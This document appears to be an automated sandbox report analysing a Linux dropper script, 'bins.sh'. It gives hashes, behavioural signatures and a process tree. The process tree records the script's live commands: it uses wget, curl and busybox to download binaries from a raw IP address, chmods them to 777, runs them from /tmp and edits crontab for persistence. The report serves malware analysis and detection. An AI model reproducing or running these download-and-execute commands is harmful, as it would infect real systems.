Analysis
-
max time kernel
150s -
max time network
155s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
04-11-2024 15:32
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
0e17ad464af64a931d90034b6bf2533d
-
SHA1
fa3ac94af8804b2721185d6d797d2684d71db640
-
SHA256
e6617aa9d237a3501f1dddfee90b1885cb95d30f621921d876fbbe676752a435
-
SHA512
73f7d54af5bc9bb3abb834cce95be1aa9fd44b03f577258be3abdcc942f67a96e217ed21732611f31361bf636448aa74ba30d92584cf6c96149b065c765dd749
-
SSDEEP
192:T4g4EGKoOqSIZNW6CWQvPlBFdCSG4Em+qSIZNJCWQvPVBFdCSI:T4LKjqSIZNW6CWQvPEqSIZNJCWQvPs
Malware Config
Signatures
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Contacts a large (1920) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 4 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodpid Process 688 chmod 697 chmod 801 chmod 811 chmod -
Executes dropped EXE 4 IoCs
Processes:
sHBnnGbWSE4VpL5lkieIJSRTX17DmNrXrr0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaFy0iZGLyQoelM8NhVr0PiXYFm7kSnv2tvfyupZsoStPpJGJRuy8vG8zOcwIDag4hB5hIvioc pid Process /tmp/sHBnnGbWSE4VpL5lkieIJSRTX17DmNrXrr 689 sHBnnGbWSE4VpL5lkieIJSRTX17DmNrXrr /tmp/0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF 698 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF /tmp/y0iZGLyQoelM8NhVr0PiXYFm7kSnv2tvfy 802 y0iZGLyQoelM8NhVr0PiXYFm7kSnv2tvfy /tmp/upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv 813 upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv -
Renames itself 1 IoCs
Processes:
0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaFpid Process 699 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc Process File opened for modification /var/spool/cron/crontabs/tmp.dcpalX crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 2 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurldescription ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Processes:
0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaFdescription ioc Process File opened for reading /proc/1003/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/115/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/660/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/782/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/908/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/943/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/22/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/799/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/807/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/905/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/985/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/17/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/717/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/861/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/973/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/318/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/771/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/890/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/15/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/775/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/988/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/1012/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/292/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/787/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/829/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/850/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/982/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/736/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/989/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/730/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/892/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/1032/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/821/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/851/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/938/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/1008/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/1027/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/1009/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/2/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/277/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/687/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/768/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/854/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/965/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/966/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/723/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/752/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/790/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/806/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/964/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/828/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/1000/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/13/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/146/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/649/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/783/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/952/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/859/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/866/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/16/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/307/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/653/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/727/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/767/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF -
Writes file to tmp directory 8 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetcurlbusyboxwgetcurlbusyboxbusyboxbusyboxdescription ioc Process File opened for modification /tmp/sHBnnGbWSE4VpL5lkieIJSRTX17DmNrXrr wget File opened for modification /tmp/sHBnnGbWSE4VpL5lkieIJSRTX17DmNrXrr curl File opened for modification /tmp/sHBnnGbWSE4VpL5lkieIJSRTX17DmNrXrr busybox File opened for modification /tmp/0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF wget File opened for modification /tmp/0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF curl File opened for modification /tmp/0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF busybox File opened for modification /tmp/y0iZGLyQoelM8NhVr0PiXYFm7kSnv2tvfy busybox File opened for modification /tmp/upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:659
-
/bin/rm/bin/rm bins.sh2⤵PID:664
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/sHBnnGbWSE4VpL5lkieIJSRTX17DmNrXrr2⤵
- Writes file to tmp directory
PID:665
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/sHBnnGbWSE4VpL5lkieIJSRTX17DmNrXrr2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:677
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/sHBnnGbWSE4VpL5lkieIJSRTX17DmNrXrr2⤵
- Writes file to tmp directory
PID:685
-
-
/bin/chmodchmod 777 sHBnnGbWSE4VpL5lkieIJSRTX17DmNrXrr2⤵
- File and Directory Permissions Modification
PID:688
-
-
/tmp/sHBnnGbWSE4VpL5lkieIJSRTX17DmNrXrr./sHBnnGbWSE4VpL5lkieIJSRTX17DmNrXrr2⤵
- Executes dropped EXE
PID:689
-
-
/bin/rmrm sHBnnGbWSE4VpL5lkieIJSRTX17DmNrXrr2⤵PID:692
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF2⤵
- Writes file to tmp directory
PID:693
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:695
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF2⤵
- Writes file to tmp directory
PID:696
-
-
/bin/chmodchmod 777 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF2⤵
- File and Directory Permissions Modification
PID:697
-
-
/tmp/0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF./0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:698 -
/bin/shsh -c "crontab -l"3⤵PID:700
-
/usr/bin/crontabcrontab -l4⤵PID:701
-
-
-
/bin/shsh -c "crontab -"3⤵PID:702
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:703
-
-
-
-
/bin/rmrm 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF2⤵PID:705
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/y0iZGLyQoelM8NhVr0PiXYFm7kSnv2tvfy2⤵PID:708
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/y0iZGLyQoelM8NhVr0PiXYFm7kSnv2tvfy2⤵PID:770
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/y0iZGLyQoelM8NhVr0PiXYFm7kSnv2tvfy2⤵
- Writes file to tmp directory
PID:795
-
-
/bin/chmodchmod 777 y0iZGLyQoelM8NhVr0PiXYFm7kSnv2tvfy2⤵
- File and Directory Permissions Modification
PID:801
-
-
/tmp/y0iZGLyQoelM8NhVr0PiXYFm7kSnv2tvfy./y0iZGLyQoelM8NhVr0PiXYFm7kSnv2tvfy2⤵
- Executes dropped EXE
PID:802
-
-
/bin/rmrm y0iZGLyQoelM8NhVr0PiXYFm7kSnv2tvfy2⤵PID:804
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv2⤵PID:805
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv2⤵PID:807
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv2⤵
- Writes file to tmp directory
PID:809
-
-
/bin/chmodchmod 777 upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv2⤵
- File and Directory Permissions Modification
PID:811
-
-
/tmp/upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv./upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv2⤵
- Executes dropped EXE
PID:813
-
-
/bin/rmrm upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv2⤵PID:814
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/u9P7y70JnaiOAmPwjcGdOPUDJpXh3HvJ3F2⤵PID:815
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/u9P7y70JnaiOAmPwjcGdOPUDJpXh3HvJ3F2⤵PID:817
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
141KB
MD53ca8decdb1e52c423c521bfff02ac200
SHA18621ecd6807109b8541912ad9e134f6fb49bfd48
SHA256dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f
SHA512b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a
-
Filesize
112KB
MD505d7857dcead18bbd86d2935f591873c
SHA134d18f41ef35f93d5364ce3e24d74730a4e91985
SHA2562cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70
SHA512d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e
-
Filesize
151KB
MD56c583043d91c55aa470c08c87058e917
SHA1abf65a5b9bba69980278ad09356e53de8bb89439
SHA2562d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948
SHA51282ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5
-
Filesize
119KB
MD51b166b95f9cb4b079ef1b9ec8363ddf3
SHA10d8eb08add467b3b5474f9b25909297fe7c2839c
SHA25694a19b33124cbbc1c570b3338f4dfbb2bf1a9335a72acf22be02a9bb8a323cc9
SHA512983ae0f399df2a6cf1dd48ba09098964c5dcb55b8bd049bce8e9c2c15dd88336642da64908d93221247a64ce987950b05042b0fac8474b179f0b1f7f0aca6925
-
Filesize
210B
MD5e2a03537d9a41e558a62714dff514de7
SHA1e49f5274fd2726da81a8a3702b52a4ee759b0caf
SHA256302990b449ba508dcd18eef5d63aca45d0934af0ecccfd97a332ea071ca2b09d
SHA512a560ee632ba4a588161bafe26cc814746eda3db19e5fbc4232e7d8e1c7176df390e91aed3256e7278f6a7f572a4798f17e70a7f0f73899a23cfa914e01c50de0